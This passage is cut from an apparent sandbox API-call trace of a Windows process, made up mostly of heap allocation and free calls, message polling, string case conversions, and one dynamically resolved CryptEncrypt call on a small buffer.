dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.812] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.813] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.813] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9d98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.818] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.819] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b17e8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b17e8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.821] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0200.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.821] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.823] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.823] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.823] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.823] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.823] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.823] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.823] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.824] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.824] RtlAllocateHeap 